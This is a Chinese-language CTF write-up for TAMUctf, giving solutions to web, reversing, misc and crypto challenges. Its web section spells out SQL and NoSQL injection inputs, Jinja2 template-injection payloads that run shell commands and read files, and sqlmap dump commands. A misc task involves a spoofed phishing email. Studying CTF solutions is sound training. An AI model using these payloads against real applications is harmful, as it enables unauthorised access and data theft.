TAMUctf writeup
Web
Not Another SQLi Challenge
尝试登陆时页面会发生跳转,可在chrome浏览器开发者工具中的Network栏勾选Preserve log保存报文内容,以便用于burp重放。
万能密码登录。
1 | $curl -s "http://web1.tamuctf.com/web/login.php" -d "username=admin' or 1=1#&password" | grep -o "gigem{.*}" |
Robots Rule
1 | $curl "http://web5.tamuctf.com/robots.txt" |
按提示伪装成Google机器人访问 robots.txt 。
1 | curl "http://web5.tamuctf.com/robots.txt" -A "Googlebot/2.1 (+http://www.google.com/bot.html)" -s | grep -o "gigem{.*}" |
Many Gig’ems to you!
1 | $ curl -s http://web7.tamuctf.com/index.html | grep -oE 'gigem{[^"]+"' |
几个页面相关的内容连起来得到flag为gigem{flag_in_source_and_cookies
。这个题目意思不大。
Science!
Difficulty: medium
flask的SSTI。
命令执行
1 | {{''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('ls -Rhl').read()}} |
文件读取
1 | {{''.__class__.__mro__[2].__subclasses__()[40]('flag.txt').read()}} |
gigem{5h3_bl1nd3d_m3_w17h_5c13nc3}
views.py内容
1 | import json |
参考文章:
- [Flask/Jiaja2 SSTI](Flask/Jiaja2 SSTI)
- Flask/Jinja2 SSTI && python 沙箱逃逸
Buckets
Checkout my s3 bucket website!
http://tamuctf.s3-website-us-west-2.amazonaws.com/Difficulty: easy
亚马逊云存储器S3 BUCKET未授权访问。
从链接知bucket name为tamuctf
,访问http://tamuctf.s3.amazonaws.com/
,
在页面中搜索发现Dogs/CC2B70BD238F48BE29D8F0D42B170127/CBD2DD691D3DB1EBF96B283BDC8FD9A1/flag.txt
,
访问http://tamuctf.s3.amazonaws.com/Dogs/CC2B70BD238F48BE29D8F0D42B170127/CBD2DD691D3DB1EBF96B283BDC8FD9A1/flag.txt
,
得到flag为flag{W0W_S3_BAD_PERMISSIONS}
。
参考文章:
Login App
Difficulty: medium
页面源码有一段JavaScript
1 | <script> |
NoSQL注入。
报文:
1 | POST /login HTTP/1.1 |
或
或
1 | curl -H 'Content-Type: application/json; charset=UTF-8' -X POST --data '{"username":{"$ne":"nosql"},"password":{"$ne":"injection"}}' http://web4.tamuctf.com/login |
参考文章:
Bird Box Challenge
We’ve got Aggies, Trucks, and Eggs!
Difficulty: hard
1 | neo@o:~$ curl -sG --data-urlencode "Search=test" http://web2.tamuctf.com/Search.php | grep -o "<h1>.*</h1>" |
注入一把梭。
1 | 'UNION ALL SELECT GROUP_CONCAT(table_schema) FROM information_schema.tables WHERE table_schema != 'information_schema' # |
翻一圈啥也没有,flag不在数据库中,尝试用户名。
1 | neo@o:~$ curl -sG --data-urlencode "Search=test'union select current_user#" http://web2.tamuctf.com/Search.php | grep -o "<h1>.*</h1>" |
实际上也可以直接上sqlmap。
1 | sqlmap -u "http://web2.tamuctf.com/Search.php?Search=eggs" -p Search --dbms mysql --random-agent --sql-shell --hex --threads 10 --proxy=http://127.0.0.1:1080 |
1337 Secur1ty
Difficulty: hard
注册用户后进入。
二维码解码结果为otpauth://totp/TAMU_CTF?secret=5UGMBIONB66MCOXH
。
消息是可以点击查看详情的。
对该链接http://web6.tamuctf.com/message?id=2
测试注入。
1 | python sqlmap.py -u "http://web6.tamuctf.com/message?id=2" -p id --threads 10 --dump-all --random-agent --hex |
得到admin用户邮箱为 1337-admin@l337secur1ty.hak ,Secret值为WIFHXDZ3BOHJMJSC
,id为1,密码哈希为02ca0b0603222a090fe2fbf3ba97d90c
,在somd5查询对应明文为secretpasscode
。
使用burp修改cookie后转发可见flag为gigem{th3_T0tp_1s_we4k_w1tH_yoU}
。
Reversing
Cheesy
1 | echo Z2lnZW17M2E1eV9SM3YzcjUxTjYhfQ== | base64 -d |
Snakes over cheese
使用pyc在线反编译 得到如下代码:
1 | # uncompyle6 version 3.2.5 |
则Fqaa转换后为 flag{decompile}
。
042
Cheers for actual assembly!
#medium
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146 .section __TEXT,__text,regular,pure_instructions
.build_version macos, 10, 14
.globl _concat ## -- Begin function concat
.p2align 4, 0x90
_concat: ## @concat
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -8(%rbp), %rdi
callq _strlen
movq -16(%rbp), %rdi
movq %rax, -32(%rbp) ## 8-byte Spill
callq _strlen
movq -32(%rbp), %rsi ## 8-byte Reload
addq %rax, %rsi
addq $1, %rsi
movq %rsi, %rdi
callq _malloc
movq $-1, %rdx
movq %rax, -24(%rbp)
movq -24(%rbp), %rdi
movq -8(%rbp), %rsi
callq ___strcpy_chk
movq $-1, %rdx
movq -24(%rbp), %rdi
movq -16(%rbp), %rsi
movq %rax, -40(%rbp) ## 8-byte Spill
callq ___strcpy_chk
movq -24(%rbp), %rdx
movq %rax, -48(%rbp) ## 8-byte Spill
movq %rdx, %rax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $80, %rsp
leaq L_.str(%rip), %rdi
movl $3, %eax
movl $14, %ecx
xorl %esi, %esi
movl $8, %edx
## kill: def %rdx killed %edx
leaq -16(%rbp), %r8
movq ___stack_chk_guard@GOTPCREL(%rip), %r9
movq (%r9), %r9
movq %r9, -8(%rbp)
movl $0, -20(%rbp)
movq %rdi, -56(%rbp) ## 8-byte Spill
movq %r8, %rdi
movl %ecx, -60(%rbp) ## 4-byte Spill
movl %eax, -64(%rbp) ## 4-byte Spill
callq _memset
movb $65, -16(%rbp)
movb $53, -15(%rbp)
movb $53, -14(%rbp)
movb $51, -13(%rbp)
movb $77, -12(%rbp)
movb $98, -11(%rbp)
movb $49, -10(%rbp)
movb $89, -9(%rbp)
movl $0, -28(%rbp)
movl $1, -32(%rbp)
movl $2, -36(%rbp)
movl -36(%rbp), %eax
imull -36(%rbp), %eax
imull -36(%rbp), %eax
movl -28(%rbp), %ecx
addl -32(%rbp), %ecx
addl -32(%rbp), %ecx
addl -32(%rbp), %ecx
imull %ecx, %eax
cltd
movl -60(%rbp), %ecx ## 4-byte Reload
idivl %ecx
movl %eax, -40(%rbp)
movl -36(%rbp), %eax
imull -36(%rbp), %eax
imull -36(%rbp), %eax
movl -28(%rbp), %esi
addl -32(%rbp), %esi
addl -32(%rbp), %esi
imull %esi, %eax
cltd
movl -64(%rbp), %esi ## 4-byte Reload
idivl %esi
movl %eax, -44(%rbp)
movl -40(%rbp), %esi
movq -56(%rbp), %rdi ## 8-byte Reload
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
movl -44(%rbp), %esi
movl %eax, -68(%rbp) ## 4-byte Spill
movb $0, %al
callq _printf
leaq L_.str.2(%rip), %rdi
leaq -16(%rbp), %rsi
movl %eax, -72(%rbp) ## 4-byte Spill
movb $0, %al
callq _printf
movq ___stack_chk_guard@GOTPCREL(%rip), %rsi
movq (%rsi), %rsi
movq -8(%rbp), %rdi
cmpq %rdi, %rsi
movl %eax, -76(%rbp) ## 4-byte Spill
jne LBB1_2
## %bb.1:
xorl %eax, %eax
addq $80, %rsp
popq %rbp
retq
LBB1_2:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "The answer: %d\n"
L_.str.1: ## @.str.1
.asciz "Maybe it's this:%d\n"
L_.str.2: ## @.str.2
.asciz "gigem{%s}\n"
.subsections_via_symbols
注意到71-78行。
1 | print "gigem{%s}"%"".join(chr(i) for i in [65,53,53,51,77,98,49,89]) |
Misc
Who am I?
What is the A record for
tamuctf.com
?
(Not in standardgigem{flag}
format)
tamuctf.com
的域名A记录为52.33.57.247
,提交即可。可使用这个网站 或者命令nslookup -type=all tamuctf.com
。
Who do I trust?
Who issued the certificate to
tamuctf.com
?
(Not in standardgigem{flag}
format)
查看证书知颁发机构为 Let's Encrypt Authority X3
。
Where am I?
What is the name of the city where the server for tamuctf.com is located?
(Not in standard gigem{flag} format)
使用在线网站 查询得到服务器所在城市为 Boardman
。
I heard you like files.
1 | $binwalk -e art.png |
Hello World
在页面全选可发现端倪。
这是一种由空白字符(空白符、制表符、换行符)组成的编程语言。这是一个 在线解释器 。
flag is gigem{0h_my_wh4t_sp4c1ng_y0u_h4v3}
。
Onboarding Checklist
From: importantperson@somebigcorp.com
Date: Feb 22, 2019 9:00 AM
To: someguy@somebigcorp.com
Subject: New Employee AccessHello Some Guy,
We need to begin sending requests for the new employee to get access to our security appliances. I believe they already know that you are authorized to make a new account request. Would you mind sending the new employee’s email address to tamuctf@gmail.com so they can process the account request?
Thank you,
Important PersonThe new employee can be a little slow to respond.
Difficulty: easy
2/26 8:42 am CST: Visting
somebigcorp.com
is not part of the challenge
按照指示发送钓鱼邮件,接收到flag为gigem{wuT_4n_31337_sp0ofer_494C4F5645594F55}
。
Crypto
-.-
To 1337-H4X0R:
Our coworker Bob loves a good classical cipher. Unfortunately, he also loves to send everything encrypted with these ciphers. Can you go ahead and decrypt this for me?
Difficulty: easy
flag.txt
1 dah-dah-dah-dah-dah dah-di-di-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dit dah-di-di-di-dit dah-di-dit di-di-di-di-dah dah-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dah-dah di-dah dah-dah-di-di-dit di-di-di-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit di-dah di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dah-dah di-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah dah-di-di-di-dit di-di-di-di-dah di-dah dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-dah dah-di-di-di-dit dah-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dit di-di-di-di-dah dit di-di-di-dah-dah dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-dah-dit di-di-di-di-dit di-di-di-di-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah di-di-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-dah di-di-di-di-dah dah-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-dah-dit di-di-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dah dah-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit dah-di-dit dah-dah-di-di-dit dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-dah-dah-dah dah-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dit di-di-di-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-dah-dah di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-dah dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dit di-di-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah dah-dah-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-dah di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-dah-dah-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit di-dah di-di-dah-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dah di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dah dit di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-di-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dit di-dah di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-dah di-di-di-dah-dah di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-dah-dah dah-dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah dah-dah-dah-dah-dit
solve.py
1 | import re |
RSAaaay
Hey, you’re a hacker, right? I think I am too, look at what I made!
1 (2531257, 43)My super secret message:
906851 991083 1780304 2380434 438490 356019 921472 822283 817856 556932 2102538 2501908 2211404 991083 1562919 38268
Problem is, I don’t remember how to decrypt it… could you help me out?
Difficulty: easy
solve.py
1 | import gmpy2 |
:)
Look at what I found!
XUBdTFdScw5XCVRGTglJXEpMSFpOQE5AVVxJBRpLT10aYBpIVwlbCVZATl1WTBpaTkBOQFVcSQdH
Difficulty: easy
直接base64解码没有可打印字符。已知flag前几个字符为gigem{,尝试base64解码后内容和gigem逐字节异或得到:):):
,发现规律。
solve.py
1 | import base64,itertools |
zip和itertools.cycle用法如下
1 | zip(seq1 [, seq2 [...]]) -> [(seq1[0], seq2[0] ...), (...)] |
另外有一个不错的工具(https://gchq.github.io/CyberChef/#recipe=Magic(3,true,false,'')&input=WFVCZFRGZFNjdzVYQ1ZSR1RnbEpYRXBNU0ZwT1FFNUFWVnhKQlJwTFQxMGFZQnBJVndsYkNWWkFUbDFXVEJwYVRrQk9RRlZjU1FkSA) 可以尝试检查数据可能的格式。
Holey Knapsack
My knapsack has a hole in it
Cipher text:
11b90d6311b90ff90ce610c4123b10c40ce60dfa123610610ce60d450d000ce61061106110c4098515340d4512361534098509270e5d09850e58123610c9
Public key:
{99, 1235, 865, 990, 5, 1443, 895, 1477}
The flag is slightly off format.
Difficulty: medium
是著名的和RSA同年发布的公钥加密系统 Merkle-Hellman Public Key Cryptosystem ,是Knapsack cryptosystems 之一,已被破解。 参见https://www.nevivur.net/writeups/2019/02/tamuctf-19/#holey-knapsack 。
解密脚本:
1 | #!/usr/bin/env python3 |